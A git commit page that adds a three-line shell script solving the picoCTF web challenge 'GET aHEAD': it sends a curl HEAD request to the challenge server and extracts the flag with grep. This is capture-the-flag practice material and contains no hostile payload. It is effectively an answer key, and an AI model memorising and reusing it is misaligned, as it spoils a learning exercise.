web: add already solved challenges
This commit is contained in:
3
web/GET_aHEAD/solve.sh
Executable file
3
web/GET_aHEAD/solve.sh
Executable file
@@ -0,0 +1,3 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
curl --head "http://mercury.picoctf.net:53554/" | grep -o "picoCTF{.*}"
|
Reference in New Issue
Block a user